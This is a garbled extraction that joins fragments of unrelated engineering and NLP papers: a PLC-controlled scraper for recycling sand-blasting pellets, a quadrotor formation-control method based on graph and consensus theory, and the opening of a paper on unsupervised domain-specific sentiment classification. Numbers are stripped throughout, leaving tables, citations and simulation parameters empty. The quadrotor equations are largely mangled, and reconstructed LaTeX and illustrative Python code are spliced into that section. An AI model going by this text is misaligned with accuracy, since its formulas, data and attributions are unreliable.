peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.aca. . . http://dx.doi.org/ . /bio. . http://www.networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto-linux-standard.html http://www.networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto-linux-standard.html http://www.networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto-linux-standard.html https://terraform.io https://traefik.io https://travis-ci.org https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html http://dx.doi.org/ . / - . http://dx.doi.org/ . /peerj-cs. 
wu c, tobar r, vinsen k, wicenec a, pallot d, lao b, wang r, an t, boulton m, cooper i, dodson r, dolensky m, mei y, wang f. . daliuge: a graph execution framework for harnessing the astronomical data deluge. astronomy and computing : – doi . /j.ascom. . . . zhao d, mohamed m, ludwig h. . locality-aware scheduling for containers in cloud computing. ieee transactions on cloud computing epub ahead of print jan doi . /tcc. . . capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.ascom. . . http://dx.doi.org/ . /tcc. . http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) design of pellet recycle scraper system in sand-blasting chamber wang baoli bombardier sifang (qingdao) transportation ltd shandong , china wang junli bombardier sifang (qingdao) transportation ltd shandong ,china zhao zhipeng bombardier sifang (qingdao) transportation ltd shandong , china e-mail: @qq.com abstract—in the process of industrial sand-blasting, it is necessary to recycle the pellet. in order to solve the existing problems such as high cost, vulnerability, maintenance difficulty and low recycle efficiency in pneumatic recycling system and mechanical recycling system of pellet, we designed a trapezoidal scraper recycle system of pellet which powered by the cylinder and controlled by plc to realize the pellet collection. the core component of the system is the scraper mechanical structure which mainly composed of scraper, scraper cylinder, baffle, scraper frame, bearing. this design has the advantages such as simple structure, resistant to breakdown, easy dismantlement. by installing pneumatic valve on the cylinder, the sand scraping speed can be adjusted. the trapezoidal scraper pellet recycling system efficiency is much higher after the contrast experiments between trapezoidal scraper and mechanical screw conveyor of the original equipment. keywords-pellet; cylinder; plc; scraper; trapezoid i. introduction in order to improve the adhesion of the surface paint, it is necessary to sand-blast on the workpiece. during the sand-blasting process, pellet need to be recycled for the purpose of cost reduction [ - ]. at present, pneumatic recycling system [ ] and mechanical recycling system [ - ] are widely used in our country for pellet recycle. however, problems such as high cost, vulnerability and maintenance difficulty still exist. therefore, it is overwhelming important to design a recycle system for pellet of low cost, resistance to breakdown and easy maintenance. ii. pellet recycle system scraper-typed pellet recycle system [ ] designed by this design is mainly composed of rod, scraper, cylinder, pellet-collect container and so on. as shown in figure , is trench, is air rod and is pellet material. the air rod is fixedly connected with the pull rod. numerous scrapers with the same structure are fixedly connected with the pull rod. the scraper has the function of one-way reversing. when the air rod is retracted, the scraper will move the pellet material to the material collecting container. when the air rod is stretched out, the scraper will flip without pushing pellet, so that pellet will achieve a cycle of directional movement. by installing pneumatic valve on the cylinder, air rod speed can be adjusted. figure . scraper pellet recycle system iii. mechanical system design a. scraper structure the core component of the material recycle system is the scraper. 
for the scraper system designed in this design as shown in fig. , fig. , fig. , fig. , is trench, is the pellet material. the physical map is shown in figure - . scraper system is mainly composed of bearing mounting plates, scraper frame, vertical bearing, lateral bearing, scraper, baffle, bayonet and scraper cylinder as shown in figure - and figure - . scraper and scraper cylinder are in dynamic connection, with functions such as one-way flip and reverse scraping. the basic scraper structure is trapezoidal. the role of bayonet is to constrain the freedom for scraper up and down. the surface of the scraper frame is fixedly connected with the scraper cylinder and the baffle. lateral bearing and vertical bearing are cross-typed with functions of guiding and undertaking weight respectively as shown in figure - . lateral bearing and vertical bearing are mounted on the bearing mounting plate. bearing mounting plate is fixedly installed on the inner wall of the trench. one end of the scraper frame is fixedly connected with the air rod. the pneumatic control valves and proximity switch are mounted onto the air cylinder. international conference on sensor network and computer engineering (icsnce ) a a i figure . scraper system figure . a-a directional view figure . i partial view figure . physical map of trapezoidal scraper b. scraper’s working theory once the scraper-typed pellet recycle is started, the scraper frame will move the trapezoid scraper forward and backward by scraper cylinder. when the scraper moves forward, the scraper will push the pellet forward due to the pulling force of the air cylinder and the blocking effect of the baffle up on the scraper. when the scraper moves backward, the baffle won’t have blocking effect on the scraper, the scraper rotates around the scraper cylinder under the reaction force of the pellet on the ground, it won’t push the pellet material. with such a reciprocating rhyme, directional movement of pellet material can be completed as well as pellet will be collected. pneumatic valve can adjust the air rod running speed according to the current situation, hence adjust the scraping pellet speed by scraper. c. scraper performance analysis  the scraper major components are cylinder, scraper, scraper frame, bearing and so on. it has advantages such as simple structure, low cost, easy dismantlement.  this design uses trapezoidal scraper and make full use of the trench surface to supervise the height of pellet piled in case it affects scraper flip. its influence is most obvious when the width of trench is small.  the bearings are distant from the ground, which can prevent the accumulation of pellet from damaging the bearings to reduce the maintenance times.  the pneumatic speed control valve is installed onto the cylinder so the scraper speed can be reduced when there are fewer pellet, which can reduce scraper loss. iv. electrical system design according to requirements of the system, this design uses siemens s - plc to control the scraper. this product is cheap, powerful with great practicality. plc i/o allocation table is shown in table . its external wiring diagram is shown in fig . proximate to the switch, plc detects the position of the air rod and controls direction change of the cylinder through solenoid valve. when the air rod fails to change direction, the plc will stop and give alarms [ - ]. table i. 
plc i/o allocation input output input component address output component address sb , start i y , cylinder out q sb , stop i y , cylinder contraction q sq , cylinder stretched out until the position of test i bj , warning light q sq , cylinder contracted until the position of test i international conference on sensor network and computer engineering (icsnce ) sb sb sq sq y y bj com i i i i q q q dc v + v v figure . schema of electrical control v. efficiency comparison between trapezoidal scraper and mechanical pellet cecycle system in this design, trapezoidal scraper and the original mechanical screw conveyor pellet recycling efficiencies are compared. the same amount of pellet are placed in two ditches. with both systems under the best operating efficiency, statistics of recycle time will be collected according to kg, kg and kg pellet. the result is shown in table . table ii. pellet recovery time recycled pellet quality (kg) pellet recovery time(hour) screw conveyor trapezoidal scraper . . . . . . data show that under the same condition, the time required to complete the kg, kg, kg recycle by trapezoidal scraper is significantly less than that of the mechanical screw conveyor thus prove that the trapezoidal scraper pellet recycle system efficiency is much higher. vi. conclusion scraped pellet recycle system is proposed in this design. it uses siemens s - plc as the controller and it's core component is the trapezoidal scraper whose advantages are simple structure, resistance to breakdown and easy dismantlement. with comparison of experiments, it shows high efficiency in recycling pellet. hence it is worthwhile of popularization. references [ ] ye yangxiang, pan zhaoji. application manual for coating technology [m]. china machine press, . [ ] yao shoushan, li geyang, hu wenbing. surface science and technology [m]. china machine press, . [ ] wang xuefang. analysis of pneumatic sand-blasting system [j].electric power locomotives and urban railway vehicles, , ( ): - . [ ] wang yongli. application examples by sand-blasting machine in the coating line [j]. modern coatings, , ( ): - . [ ] liu fugui. research on screw conveyor machine of pellet [j]. rolling stock workers, ( ): - . [ ] luan xianyu, liu hongnan. design of blasting chamber scraper recycle system based on plc [j]. mechanical engineers, ( ): - [ ] liu huabo. siemens s - plc programming and application case selection [m]. china machine press, . [ ] liao changchu. s - plc programming and application [m]. china machine press, . international conference on sensor network and computer engineering (icsnce ) quadrotor formation control method based on graph and consistency theory yang sen , department of uav engineering, ordance engineering college, shijiazhuang, china school of automation science and electrical engineering, beihang university, beijing, china e-mail: @qq.com xi leiping department of uav engineering ordance engineering college shijiazhuang, china abstract—this paper introduces graph and group system consistency theory and puts forward a quadrotor formation control method. the quadrotor is described as a second-order integrator dynamic system, and the relative position deviation of different quadrotors is used to describe formation. according to the communication topology relationship between quadrotors, the formation is modeled by graph theory. the fusion of the pilot-follow and graph theory method is analyzed, and a second-order coherence algorithm with a pilot is presented. 
with this algorithm, the quadrotors can complete behaviors just as formation rally and formation mobility etc. finally the paper verifies the availability of the proposed method through simulation tests. keywords-formation control; graph theory; consistency theory; second-order integrator; pilot-follow method i. introduction in recent years, quadrotors become more and more popular among scientific researchers because of their small size, light weight, easy manipulation and high efficiency while performing tasks in uncertain and dangerous environment. due to the shortage of its load and the sensor performance, a single quadrotor is highly restricted in complex tasks. thus, more and more quadrotors are applied to work together. multiple quadrotors formation control is a major and basic research subject in the studies of quadrotors cooperative control. it has attracted the interests of many researchers both at home and abroad. the main formation control methods are pilot-followed method, virtual structure method, behavior-based method and graph theory method. graph theory method means to model the formation to directed graphs or undirected graphs according to the communication network topology relationship and the formation conditions, and then analyze and design the formation information flow and the formation control algorithm through mature graph theory. the method of graph theory has gradually become the mainstream of formation control as it is a fusion of several methods talked before [ ]. consistency theory has been applied in formation control research under a variety of circumstances such as the fixed topology, time-varying topology, communication time delay of ground robots, underwater vehicles and satellite systems etc [ ]. literature [ ] proposes a model of multi-robot formation control, which takes a robot as a single integrator dynamics model and analyzes the multi-robot system formation and its stability with consistency theory. as shown in literature [ ], in the grasp laboratory of the pennsylvania university, a team led by kumar describes the formation with the relative position and relative direction of the quadrotors. by introducing the error of relative position, they control the formation flight of four quadrotors with consistency algorithm. however, the control structure they describe is a centralized control structure which demands high calculation capability of the central control unit but has poor extensibility. in literature [ ], in the study of the automatic quadrotors formation, a communication topology solution is put forward based on the hamilton loop in the cascade control system. at present, most of the literature describes intelligence agents as first-order integrator power systems, which is relatively simple. but many complex systems must be described by second-order or higher order system so as to international conference on sensor network and computer engineering (icsnce ) realize accurate and effective control. this article combines graph theory method and pilot-follow method and describes a as s second order integrator system. through the second-order coherence algorithms, the formation of control method is studied under the topological structure that only one quadrotor is informed of the flight path and all the follower quadrotors can receive information from the pilot. ii. graph theory and consistency of the group system information a. 
graph theory

a graph is a data structure composed of a vertex set and a binary relation between vertices (i.e., the set of edges), usually written as $G(V, E)$. the collections of vertices and edges are represented as

$V(G) = \{v_1, v_2, \ldots, v_n\}$,  $E(G) = \{(v_i, v_j) : v_i, v_j \in V(G)\}$.

in the diagram, if node $i$ and node $j$ exchange information, the edge $(v_i, v_j)$ exists; if the information exchange has no direction, then

$(v_i, v_j) \in E \Leftrightarrow (v_j, v_i) \in E$

and the diagram is called an undirected graph. if the information stream flows from node $i$ to node $j$, then the edge is directional and the diagram is a directed graph. an undirected graph can be considered as a special case of a directed graph. a directed graph is more practical as it takes the one-way flow of information into consideration. the adjacency matrix describes the connection relationship between the nodes in algebraic form; denote the adjacency matrix as $A = [a_{ij}] \in R^{n \times n}$, where

$a_{ij} = 1$ if $(v_i, v_j) \in E$, and $a_{ij} = 0$ otherwise.

the neighbor nodes of node $i$ form the set $N_i(G) = \{v_j : (v_i, v_j) \in E\}$. in an undirected graph, the degree of any node $i$ is defined as the number of neighbor nodes of node $i$; in a directed graph, the node degree is equal to the sum of the in-degree and the out-degree of node $i$, namely $d(v_i) = d_{in}(v_i) + d_{out}(v_i)$, where the in-degree and the out-degree of node $v_i$ are respectively defined as

$d_{in}(v_i) = \sum_{j=1}^{n} a_{ji}$,  $d_{out}(v_i) = \sum_{j=1}^{n} a_{ij}$.

the laplacian matrix of an undirected/directed graph adopts the following definition:

$l_{ij} = \sum_{k \neq i} a_{ik}$ if $i = j$, and $l_{ij} = -a_{ij}$ if $i \neq j$.

b. group system information consistency

assuming that the number of flight vehicles in the formation is $n$, we use $G_n = (V_n, E_n)$ to indicate the communication topology among the vehicles, in which $V_n = \{1, \ldots, n\}$ is the node set and $E_n \subseteq V_n \times V_n$ is the edge set. the matrices $A_n = [a_{ij}] \in R^{n \times n}$ and $L_n = [l_{ij}] \in R^{n \times n}$ are respectively the adjacency matrix and the asymmetric laplacian of graph $G_n$. consider a simple single-integrator system:

$\dot{\xi}_i = u_i$, $i = 1, \ldots, n$,

where $\xi_i \in R^m$ and $u_i \in R^m$ are respectively the information state and the control input of vehicle $i$. the common continuous-time consistency (consensus) algorithm for the first-order integrator system is

$u_i = -\sum_{j=1}^{n} a_{ij}(t)\,(\xi_i - \xi_j)$, $i = 1, \ldots, n$.

the above two equations can be rewritten in matrix form as

$\dot{\xi} = -\big(L_n(t) \otimes I_m\big)\,\xi$.

theorem [ ]: under a fixed, time-invariant communication topology, the flight-vehicle formation can gradually reach agreement if and only if the directed communication topology contains a directed spanning tree; under a time-varying communication topology, the condition for the formation to reach agreement is the existence of an infinite number of uniformly bounded adjacent time intervals such that the union of the directed communication topologies over each of these intervals contains a directed spanning tree. when considering the maneuvering of the flight-vehicle formation, we describe the information states with a second-order integrator dynamic system.
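as a quick numerical illustration of the first-order algorithm above (not code from the paper), the sketch below integrates $\dot{\xi} = -(L_n \otimes I_m)\,\xi$ with a forward-euler step on a small directed graph that contains a directed spanning tree; the adjacency matrix, initial states and step size are arbitrary example values. the states converge to a common value, as the theorem predicts.

```python
import numpy as np

# illustrative directed graph on 4 nodes (entry [i, j] = 1 means edge i -> j),
# chosen so that the graph contains a directed spanning tree (a directed cycle)
A = np.array([[0, 1, 0, 0],
              [0, 0, 1, 0],
              [0, 0, 0, 1],
              [1, 0, 0, 0]], dtype=float)

# graph laplacian: l_ii = sum_k a_ik, l_ij = -a_ij for i != j
L = np.diag(A.sum(axis=1)) - A

xi = np.array([3.0, -1.0, 0.5, 2.0])   # arbitrary scalar initial states (m = 1)
dt = 0.01

for _ in range(2000):                  # forward-euler integration of xi' = -L xi
    xi = xi + dt * (-L @ xi)

print("final states:", xi)             # all entries converge to a common value
```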
the second-order dynamic systems integrator algorithm is an extension of the first-order integrator power system consistency algorithm. the existence of a tufted spanning tree in the directed graph is conditions of second-order dynamic systems integrator agreement necessary rather than sufficient conditions. taking the following second order integrator power system as an example: i i   i u   m i r  is the state of system information; m i r  is system information state derivative; m i u r is the system information input control of member i. assuming that the same communication topology about the transfer between i  and i  exists among different quadrotors, and also uses  ,n n ng v  to represent, and n a and n l respectively represent the adjacency matrix and asymmetric laplace matrix. a basic second-order dynamic systems integrator consistency algorithm is as follows:        [ ] n i ij i j i j j u a t t             , , ,i n  .for any time t is a positive number. if i  and i  respectively signify the position and speed of vehicle i for all ( ) i  and ( ) i  , through operation type ( ), when ,t   i j    and i j    , the formation may reach an agreement at this time. if [ ] , t t t t n      [ ] , t t t t n      the equation above can be rewritten as:  ( ) mt i                      while ( ) ( ) ( ) ( ) n n n n n i t l t t l t          . theorem : algorithms ( ) asymptotically may reach consistent if and only if there are only two zero eigenvalues in  , and other nonzero eigenvalues are all negative real part, particularly for large enough t, ( ) ( )+ ( ) ( ) ( ) n n n i i i i i i i i i a i i t p t p t p           , thereinto t [ ] n p p p p , t n p  , t n p l .relevant attests for the theorem refers to the literature [ ]. iii. system modeling and design of quadrotors formation quadrotor is a typical underactuated system which has four input and six output. they are usually divided into “x” type and“+ ”type. quadrotor realizes pitch, yaw and roll motion of the plane by controlling the four motor and the speed of the propeller. the definition of inertia coordinate system  i oxyz and body coordinate system  b oxyz , as shown in fig. . x z y q z x y o f b l r  figure . the definition of quadrotor’s position coordinate system international conference on sensor network and computer engineering (icsnce ) , v r  is the position and velocity of the quadrotor under the inertial coordinates, and r is the varying attitude angular velocity of the vehicle under coordinate system. r   is referred to as the rotation matrix from the coordinate system to the inertial coordinate system, c c c s s s c s s c s c c s c c s s s s c c s s s s c c c                                               sins   and  cosc   represent the sine and cosine.   t r     is the euler angle of quadrotor in the vehicle coordinate system. [ ] t z e is the unit vector of z shaft. z n e  is column of attitude matrix. m is the weight of the quadrotor. j diag j j j r   = is the system rotation inertia matrix. g is the acceleration of gravity. t is the total lift of the four propellers that drives the quadrotors’ position change. 
  t    respectively represent the control matrix of roll, pitch and yaw direction. it is assumed that the center of the aircraft is the origin of the coordinate system. driving motor has no installation angle error. excepting the rotor rotation, the rest of a quadrotor is supposed as rigid. taking the north, east, and the ground coordinate system as the inertial coordinate system, this paper adopts the system model in the literature [ ]:   z v mv mg n s                       e t r r j j  the quadrotor position control comprises the inner and outer loop control structure, in which the inner ring controls posture and the outer one controls position. the controller can be seen in literature [ ]. the main concern here is the formation control algorithm. the formation controller receives state information of itself and the other members of the formation through its own sensors and the wireless communication network, puts out the respective expected position and posture to position controller, and drives actuator to perform formation task, as shown in fig. . the key study is the design of formation controller based on second order integrator dynamic model. position controller attitude controller formation controller dynamics of four rotor uav expected attitude position and speed attitude and angular velocity moment lift expected position expected orientation uav i position controller attitude controller formation controller dynamics of four rotor uav expected attitude position and speed attitude and angular velocity moment lift expected position expected orientation uav j state interaction figure . structure of the formation control system if the formation size is n, according to the information interaction relationship between quadrotors, the quadrotors formation can be modeled as a directed graph. i is the node i v in the directed graph, information flowing from i to j is marked as edge , , ( , , , ) ij e i j n  . number is specified as the pilot and the rest are followers. in formation control layer, we can see each of the quadrotor as a particle in three-dimensional space, and the quadrotors system meet the type ( ). ( ) n i t r  and ( ) ( , , )n i t r n   represent position and speed information of quadrotor i. ( ) n i u t r is the corresponding input control. assuming that the pilot only broadcast its own information r  and r  , the rest followers are able to receive state information from the pilot. the formation topology structure is shown in fig. . regardless of the pilot, the topological relationship between followers can be arbitrary directed graph. international conference on sensor network and computer engineering (icsnce ) … n r  figure . communication topology graph in the process of formation, communication topology remains unchanged and maintains fixed formation. for the convenience of analysis, we consider the simple case of one dimension, the analysis of the three dimensional space can be obtained through the kronecker product. the center of the formation is defined as c v , and its coordinate is ( , , ) c c c c r x y z . cv is the consistent balance point for consistency algorithm. if there is a leading vehicle, c v is the position of the leader, and when without a leader it is the geometric center. we adopt relative position vector to describe the formation and define the relative position deviation as * * * * ( , , ) t i i i i r x y z . 
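the rotation matrix and the translational dynamics above did not survive extraction cleanly, so the following sketch spells out a common textbook form consistent with the symbols just defined (roll $\phi$, pitch $\theta$, yaw $\psi$ with $s = \sin$, $c = \cos$, mass $m$, gravity $g$, total lift $T$, unit vector $e_z$). the exact sign and axis-ordering conventions (z-y-x euler angles, north-east-down frame) are assumptions for illustration, not a quotation of the paper's equations.

```python
import numpy as np

def R_body_to_inertial(phi, theta, psi):
    """R = Rz(psi) @ Ry(theta) @ Rx(phi): body frame -> inertial frame
    (standard z-y-x euler-angle convention; assumed, not copied from the paper)."""
    c, s = np.cos, np.sin
    Rx = np.array([[1, 0, 0], [0, c(phi), -s(phi)], [0, s(phi), c(phi)]])
    Ry = np.array([[c(theta), 0, s(theta)], [0, 1, 0], [-s(theta), 0, c(theta)]])
    Rz = np.array([[c(psi), -s(psi), 0], [s(psi), c(psi), 0], [0, 0, 1]])
    return Rz @ Ry @ Rx

def translational_accel(phi, theta, psi, thrust, mass, g=9.81):
    """m v' = m g e_z - T R e_z in a north-east-down frame (e_z points down);
    a textbook form of the position dynamics referred to above."""
    e_z = np.array([0.0, 0.0, 1.0])
    return g * e_z - (thrust / mass) * R_body_to_inertial(phi, theta, psi) @ e_z

# hover check: level attitude and thrust = m g give (almost) zero acceleration
print(translational_accel(0.0, 0.0, 0.0, thrust=1.2 * 9.81, mass=1.2))
```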
the spatial location relations are shown in fig. . for the condition of the existence of a pilot, the following consistency algorithm is shown as:               * * * d d i l i i ix x n ij i i j j ix jx j u t v x x x v v x x x x v v                          d x and d x x are respectively the information of the pilot’s position and speed.  is the adjacency relation between followers and the pilot. when a follower i can receive the pilot's state information,   ,otherwise   . here we take   . in this algorithm, the followers also need to obtain the second order derivative information about the pilot status, namely the pilot input control. i r d r j r * i r * j r * * i j r r  x z y figure . the position relationship among formation members theorem : if i  is the i characteristic values of n l , and i i      ,   . when all of the n  nonzero eigenvalues of n l are all negative real part if   ,otherwise,         re im max im cos arctan re i i i and i i i v                 therefore in the consistency of the algorithm ( ), when t  , then *( ) d i i x x x  and d ix x v v , , , ,i n  . when t  , algorithm ( ) will ensure *d i i x x x  and d ix x v v  . at this time the formation reaches consistency and generates the specified array. on the stabilization issue of the formation, each quadrotor must agree on the formation center. the center’s position is changeless and the velocity is zero, which means d x v  . through the consistency algorithm, different formation can be designed only by changing the communication topology g and setting up different location deviation * i r . international conference on sensor network and computer engineering (icsnce ) iv. experiment simulation a. parameter settings quadrotor control adopts traditional pid control algorithm. the inner ring control is for posture stability while the outer ring for position control. the experiment assumes that the underlying controller is well performed. on that basis, the formation control module is inserted. the formation number is n = , and there are no obstacles in the flight space, the system mass m = . kg, and the moment of inertia are . . x y z j j kg m j kg m    , the communication topological structure is shown in fig. . the specific parameter is set as ,    . quadrotor numbers is the pilot and the remaining four are the followers. the deviation to describe the relative position of the expectation formation is set to * * * * * . . [ ] . . r r r r r            figure . quadrotor’s communication topology in the simulation experiments this experiment sets two circumstances: formation rally and formation maneuvers. case : the pilot hovers in the air waiting for formation in the designated position. at this point, the setting d v  ; case : the pilot make circular motion at fixed height in the air, while the other four quadrotors track the movement of the pilot and ultimately form a set mobile fleet. the trajectory of the pilot is as follows: cos sin d d d v t y t z        the simulation step is . s, and the simulation time is s. b. simulation results case : quadrotors formations are assembled as shown in fig. . at the beginning of the simulation, the pilot waits at a position in the air while the other four take off from the ground. each quadrotor maneuvers in the pre-selected direction and after a period of time they construct a diamond formation with the pilot as the center. 
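the consistency algorithm with a pilot given above is straightforward to prototype. the sketch below is an illustrative, simplified one-dimensional version (not the authors' matlab simulation): the pilot hovers at a fixed point as in the rally case, the followers run the second-order consensus update on the offset position errors and on the velocities, and the gains, offsets and communication topology are made-up example values. each quadrotor is treated purely as a double integrator, i.e., only the formation-control layer is modeled and the inner attitude/position loops are ignored.

```python
import numpy as np

n = 5                        # 1 pilot (index 0) + 4 followers, illustrative
gamma, kappa = 1.0, 1.0      # consensus gains (made-up values)
offsets = np.array([0.0, 1.0, -1.0, 2.0, -2.0])   # desired x_i* relative to the centre

# follower communication graph (a_ij = 1 if i receives from j), plus pilot link b_i
A = np.zeros((n, n))
A[2, 1] = A[3, 2] = A[4, 3] = 1.0        # follower chain, arbitrary topology
b = np.array([0.0, 1.0, 1.0, 1.0, 1.0])  # every follower hears the pilot

x = np.array([0.0, 3.0, -4.0, 5.0, -6.0])   # initial positions
v = np.zeros(n)
dt, T = 0.01, 20.0

def pilot_state(t):
    # pilot hovers at a fixed point (formation rally case): x_d, v_d, a_d
    return 0.0, 0.0, 0.0

for step in range(int(T / dt)):
    xd, vd, ad = pilot_state(step * dt)
    x[0], v[0] = xd, vd                  # pilot follows its own trajectory
    u = np.zeros(n)
    for i in range(1, n):
        e_i = x[i] - offsets[i]
        u[i] = ad - gamma * b[i] * ((e_i - xd) + (v[i] - vd))
        for j in range(n):
            e_j = x[j] - offsets[j]
            u[i] -= kappa * A[i, j] * ((e_i - e_j) + (v[i] - v[j]))
    v[1:] += dt * u[1:]
    x[1:] += dt * v[1:]

print("final positions:", np.round(x, 3))   # ~ the offsets around the pilot
print("final velocities:", np.round(v, 3))  # ~ the pilot's velocity (zero here)
```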
that verifies the effectiveness of algorithm ( ) in rallying the formation. figure . simulation curve of the generation of the quadrotors formation case : quadrotors formation maneuvers as shown in fig. . at the beginning of the simulation, the pilot do circular motion in the air, the followers in different positions on the ground, take off and receive information about the pilot status. in algorithm ( ), each follower will apply the second order derivative of the pilot’s status information, which means the followers know the pilot’s control input at any time. the follower quadrotors do not simply gather towards the pilot, but do circular motion in the plane direction like the pilot. as a result they rise in a spiral and eventually converge to a stabile formation with the pilot as the center. international conference on sensor network and computer engineering (icsnce ) figure . simulation curve of quadrotor formation maneuver fig. and fig. show more clearly the rule of change in position and speed of each members of the formation from the x direction and z direction. from fig. (a), we can see the quadrotors rapidly gather to the pilot (the black curve) after they take off. at t s the followers get close to the specified location and they are able to track the trajectory change of the pilot. from fig. (b), we can see after t s with consistency algorithm, the following quadrotors is consistent with the pilot’s speed and are able to track speed changes of the pilot. fig. describes quadrotors’ position and speed change curve in z direction. the changing rule is roughly the same to that in the x direction, so we do not talk about it in detail. under the guidance of second order coherence algorithm, quadrotors formation converges at a higher speed and realizes better synchronization. (a) position change in x-direction (b) velocity change in x-direction figure . curve of each quadrotor’s position and velocity change in x-direction (a) position change in z-direction (b) velocity change in z-direction figure . curve of each quadrotor’s positon and velocity change in z-direction v. conclusion according to quadrotor aircraft fleet formation problem, the quadrotor is described as a second order integrator dynamics model and a method called distributed formation control method is designed based on graph theory and leading to follow method. the research is mainly focused on the second-order coherence algorithm in the application of the quadrotor aircraft fleet formation. in formation control layer, the quadrotor is regard as a particle in three-dimensional space, and by using the consistent algorithm with leader, the control requirements of marshalling and marshalling maneuver are realized; finally, the validity of the consistency marshalling algorithm is verified by matlab simulation. references [ ] wang x.k., li x., zheng z.q., survey of develop- ments on multi-agent formation control related problems[j]. control and decision, , ( ): - . [ ] ren w., beard r.w., distributed consensus in multi-vehicle cooperative control theory and applications[m]. new york: spring, . [ ] wu z.p., guan z.h.,wu x.y., consensus based formation control of multi-rotor system[j]. control and decision, , ( ): - . international conference on sensor network and computer engineering (icsnce ) [ ] matthew t, nathan m, vijay k. trajectory design and control for aggressive formation flight with quadrotors [j]. auton robot, , : - . 
[ ] xing g.s., du c.y., zong q., chen h.y., sun h.x., consensus-based distributed motion planning for autonomous formation of miniature quadrotor groups[j]. control and decision, , ( ): - . [ ] olfati-saber r, fax j a, murray r m. consensus and cooperation in networked multi-agent system[c]. proc of the ieee. : - . [ ] wei r, ella a, distributed multi-vehicle coordinated control via local information exchange[j].robust nonlinear control. , : - . [ ] li g.c., wang l., wang z.l., xu d.x., trajectory tracking control of quad-rotor uav based on quaternion[j]. journal of applied sciences. , ( ): - . bootstrap domain-specific sentiment classifiers from unlabeled corpora andrius mudinas, dell zhang, and mark levene department of computer science and information systems birkbeck, university of london london wc e hx, uk andrius@dcs.bbk.ac.uk, dell.z@ieee.org, mark@dcs.bbk.ac.uk abstract there is often the need to perform sentiment classification in a particular domain where no labeled document is available. although we could make use of a general-purpose off-the- shelf sentiment classifier or a pre-built one for a different domain, the effectiveness would be inferior. in this paper, we explore the possibil- ity of building domain-specific sentiment clas- sifiers w ith u nlabeled d ocuments o nly. our investigation indicates that in the word em- beddings learned from the unlabeled corpus of a given domain, the distributed word rep- resentations (vectors) for opposite sentiments form distinct clusters, though those clusters are not transferable across domains. ex- ploiting such a clustering structure, we are able to utilize machine learning algorithms to induce a quality domain-specific senti- ment lexicon from just a few typical senti- ment words (“seeds”). an important finding is that simple linear model based supervised learning algorithms (such as linear svm) can actually work better than more sophis- ticated semi-supervised/transductive learning algorithms which represent the state-of-the- art technique for sentiment lexicon induction. the induced lexicon could be applied directly in a lexicon-based method for sentiment clas- sification, b ut a h igher p erformance c ould be achieved through a two-phase bootstrapping method which uses the induced lexicon to as- sign positive/negative sentiment scores to un- labeled documents first, a nd t hen u ses those documents found to have clear sentiment sig- nals as pseudo-labeled examples to train a document sentiment classifier v ia supervised learning algorithms (such as lstm). on sev- eral benchmark datasets for document senti- ment classification, our end-to-end pipelined approach which is overall unsupervised (ex- cept for a tiny set of seed words) outper- forms existing unsupervised approaches and achieves an accuracy comparable to that of fully supervised approaches. introduction sentiment analysis (liu, ) is a popular research topic which has a wide range of applications, such as summarizing customer reviews, monitoring social media, and predicting stock market trends (bollen et al., ). a basic task in sentiment analysis is to classify the sentiment polarity of a given piece of text (document), i.e., whether the opinion expressed in the text is positive or negative (pang et al., ), which is the focus of this paper. 
there are many different approaches to senti- ment classification in the natural language process- ing (nlp) literature — from simple lexicon-based methods (ding et al., ; thelwall et al., ; thelwall et al., ) to learning-based approaches (pang and lee, ; turney, ; jo and oh, ; argamon et al., ; lin and he, ), and also hybrid methods in between (mudinas et al., ; zhang et al., ). no matter which ap- proach is taken, a sentiment classifier built for its target domain would work well only within that spe- cific domain, but suffer a serious performance loss once the domain boundary is crossed. the same word could drastically change its sentiment polarity (and/or strength) if it is used in a different domain. for example, being “small” is likely to be negative transactions of the association for computational linguistics, vol. , pp. – , . action editor: diana mccarthy. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. for a hotel room but positive for a digital camcorder, being “unexpected” may be a good thing for the end- ing of a movie but not for the engine of a car, and we will probably enjoy “interesting” books but not nec- essarily “interesting” food. here, the domain could be defined not by the topic of the documents but by the style of writing. for example, the meanings of words like “gay” and “terrific” would depend on whether the text was written in a historical era or modern times. when we need to perform sentiment classifica- tion in a new domain unseen before, there are usu- ally neither labeled dictionary available to employ lexicon-based sentiment classifiers nor labeled cor- pus available to train learning-based sentiment clas- sifiers. it is, of course, possible to resort to a general- purpose off-the-shelf sentiment classifier, or a pre- built one for a different domain. however, the ef- fectiveness would often be unsatisfactory because of the reasons mentioned above. there have been some studies on domain adaptation or transfer learn- ing for sentiment classification (blitzer et al., ; tan et al., ; pan et al., ; glorot et al., ; yoshida et al., ; bollegala et al., ; xia et al., ; yang and eisenstein, ), but they still require a large amount of labeled training data from a fairly similar source domain, which is not always feasible. those algorithms also tend to be computational-expensive and time-consuming (mo- hammad and turney, ; fast et al., ). in this paper, we propose an end-to-end pipelined nearly-unsupervised approach to domain-specific sentiment classification of documents for a new domain based on distributed word representations (vectors). as shown in fig. , the proposed approach consists of three main stages (components): ( ) domain-specific sentiment word embedding, ( ) domain-specific sentiment lexicon induction, ( ) domain-specific sentiment classification of doc- uments. briefly speaking, given a large unlabeled corpus for a new domain, we would first set up the vector space for that domain via word embedding, then induce a sentiment lexicon in the discovered vec- tor space from a very small set of seed words as well as a general-purpose lexicon, and finally exploit the induced lexicon in a lexicon-based document sentiment classifier to bootstrap a more effective learning-based document sentiment classifier for that domain. 
